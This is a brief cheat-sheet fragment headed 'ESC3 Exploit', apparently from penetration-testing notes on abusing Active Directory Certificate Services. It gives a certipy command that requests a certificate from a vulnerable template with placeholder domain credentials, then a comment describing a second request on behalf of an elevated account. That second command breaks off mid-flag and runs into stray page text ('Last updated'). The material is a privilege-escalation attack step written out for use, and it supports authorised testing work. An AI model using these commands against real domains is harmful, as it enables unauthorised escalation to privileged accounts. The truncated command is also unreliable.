ESC3
Exploit
# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]
# Request a certificate using the .pfx output from above command with -on-behalf-of an elevated account
certipy req -uLast updated